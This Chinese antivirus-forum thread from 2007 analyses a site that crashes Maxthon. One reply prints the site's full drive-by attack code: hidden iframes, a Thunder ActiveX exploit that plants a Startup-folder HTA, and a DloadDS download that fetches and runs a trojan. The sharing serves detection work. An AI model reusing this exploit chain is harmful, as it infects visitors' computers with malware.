查看: 5257|回复: 30
收起左侧

[病毒样本] 此网站可使遨游瞬间崩溃!卡巴报溢出!大家分析下。

[复制链接]
yu88480
发表于 2007-10-12 13:59:19 | 显示全部楼层 |阅读模式
偶然间发现的一个网站,打开后我的遨游(1.62)瞬间崩溃退出!再试时卡巴报警缓冲区代码溢出!,点拒绝后遨游再次关闭退出。不知道是什么原因?
卡巴的主动防御界面上有显示事件个数,但打开日志无任何记录。

不知道其他各位是否这样,用IE浏览器或者高版本的遨游是不是会崩溃掉?其它的监控安全软件是否有报警?


大家可以试试:

网址:http://www.pczhishi.com/html/diannaojichu/diannaoruanjianjichu/20070408/2379.html
stephenjf
头像被屏蔽
发表于 2007-10-12 14:01:54 | 显示全部楼层
用的opera,没反应
kp2006
头像被屏蔽
发表于 2007-10-12 14:03:03 | 显示全部楼层
没东西 很好网站 kv不报
yu88480
 楼主| 发表于 2007-10-12 14:09:23 | 显示全部楼层
原帖由 kp2006 于 2007-10-12 14:03 发表
没东西 很好网站 kv不报



不会吧,你用的什么的浏览器啊?
a256886572008
发表于 2007-10-12 14:12:00 | 显示全部楼层
<iframe src=http://xxx.cslr1.com/htm1.htm width=0 height=0></iframe>

<iframe width='100' height='100' src='ie1.htm'></iframe>
<iframe width='100' height='100' src='ie2.htm'></iframe>
<iframe width='100' height='100' src='ie3.htm'></iframe>
<iframe width='100' height='100' src='ie4.htm'></iframe>
<iframe width='100' height='100' src='ie5.htm'></iframe>
<iframe width='100' height='100' src='ie6.htm'></iframe>


http://xxx.cslr1.com/ie1.htm
<script language=javascript src=http://xxx.cslr1.com/cookies.js></script>


http://xxx.cslr1.com/cookies.js
document.writeln("<script>");
document.writeln("function Kao_Kaspersky(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<iframe width=100 height=100 src=\"http:\/\/zzz.cslr1.com\/bf.htm\"><\/iframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("Kao_Kaspersky();");
document.writeln("<\/script>");
document.writeln("<script>window.onerror=function(){return true;}<\/script>")


http://xxx.cslr1.com/ie2.htm
<SCRIPT src="webxl.js"></SCRIPT>


http://xxx.cslr1.com/webxl.js
var Sofzl_cn = null
;function shit()
{
        try{Sofzl_cn = new ActiveXObject("ThunderServer.webThunder.1");}
        catch(e){return;}
        var Sofzl;
        Sofzl="<script defer> var Sofzlcn=\"<html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var Sofzlcn=new ActiveXObject(\\\"wscript.shell\\\");Sofzlcn.Run(\\\"C:\\\\\\\\Progra~1\\\\\\\\Intern~1\\\\\\\\IEXPLORE.EXE http://xxx.cslr1.com/Webxls.htm\\\",0,0);function runmm(){var path=Sofzlcn.Specialfolders(\\\"MyDocuments\\\");var Qq275756717=path.substring(0,path.lastIndexOf(\\\"\\\\\\\\\\\"));Qq275756717+=\\\"\\\\\\\\Local Settings\\\\\\\\Temporary Internet Files\\\\\\\\Content.IE5\\\\\\\\\\\";var Sofzl2=new ActiveXObject(\\\"Sofzlcn.application\\\");var Sofzl3=Sofzl2.NameSpace(Qq275756717);for(i=0;i<Sofzl3.Items().Count;i++){var Folder=Sofzl3.Items().Item(i).path;Folder+=\\\"\\\\\\\\ysydown[1].exe\\\";try{Sofzlcn.exec(Folder);}catch(e){};}window.close();};Sofzlcn.Run(\\\"cmd.exe /c tree c:\\\\\\\\ /f\\\",0,1);runmm();<\\/script></body></html>\";var wwwsofzlcn = new ActiveXObject(\"ADODB.Recordset\");wwwsofzlcn.Fields.Append(\"wwwsofzlcn\", 200, 3000);wwwsofzlcn.Open();wwwsofzlcn.AddNew();wwwsofzlcn.Fields(\"wwwsofzlcn\").Value=Sofzlcn;wwwsofzlcn.Update();wwwsofzlcn.Save(\"C:\\\\Documents and Settings\\\\All Users\\\\「开始」菜单\\\\程序\\\\启动\\\\microsofts.hta\",0);wwwsofzlcn.Close();</script>";
        var ret=Sofzl_cn["AddCateogry"](Sofzl);
        Sofzl_cn["SetBrowserWindowSize"](0,0,400,300);
        var Seven = Sofzl_cn["GetServerPath"]();
        Seven = Seven["substr"](0, Seven["length"]-1);
        Seven+="\\page\\index.htm";
        Sofzl_cn.SetBrowserWindowData(Seven,"wwwsofzlcn");
        Sofzl_cn.HideBrowserWindow(1);
        return;
}


http://xxx.cslr1.com/ie3.htm
<SCRIPT LANGUAGE='JavaScript'>
<!--
function ResumeError() {
return true;
}
window.onerror = ResumeError;
// -->
</SCRIPT>
<script>document.writeln("<html><head><script>function LoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVC(){chenzi[\"DloadDS\"]
(\"http://xxx.cslr1.com/ysyupdate.cab\",\"ysydown.exe\",0);}<\/script><\/head><OBJECT ID=\"chenzi\" cLaSsId=\"cLSiD:{A7F05EE4-0426-454F-8013-C41E3596E9E9}\"><\/OBJECT><script>LoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVC()<\/script><\/html>");</script>

[ 本帖最后由 a256886572008 于 2007-10-12 14:25 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
T-G001
发表于 2007-10-12 14:13:44 | 显示全部楼层
IE7,没事,IE拦了一个加载项,但根据我的经验,凡出现了那个加载项的都不是什么好网站
BING126
头像被屏蔽
发表于 2007-10-12 14:20:56 | 显示全部楼层
用世界之窗没反应!
yu88480
 楼主| 发表于 2007-10-12 14:21:43 | 显示全部楼层
怪事了,希望用遨游的朋友能帮我证实下,谢谢!
kp2006
头像被屏蔽
发表于 2007-10-12 14:26:09 | 显示全部楼层
kv

http://bbs.kafan.cn/attachment.php?aid=138641->ysyupdate.exe->ysydown.exe      trojan/agent.kxp             2007-10-12 下午 02:25:32 已删除

kv不报网站

[ 本帖最后由 kp2006 于 2007-10-12 14:27 编辑 ]
The EQs
发表于 2007-10-12 14:38:30 | 显示全部楼层
C:\Documents and Settings\Don johnson\桌面\ysydown.rar &raquo; RAR &raquo; ysydown.exe - probably unknown NewHeur_PE virus
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-19 21:39 , Processed in 0.128911 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表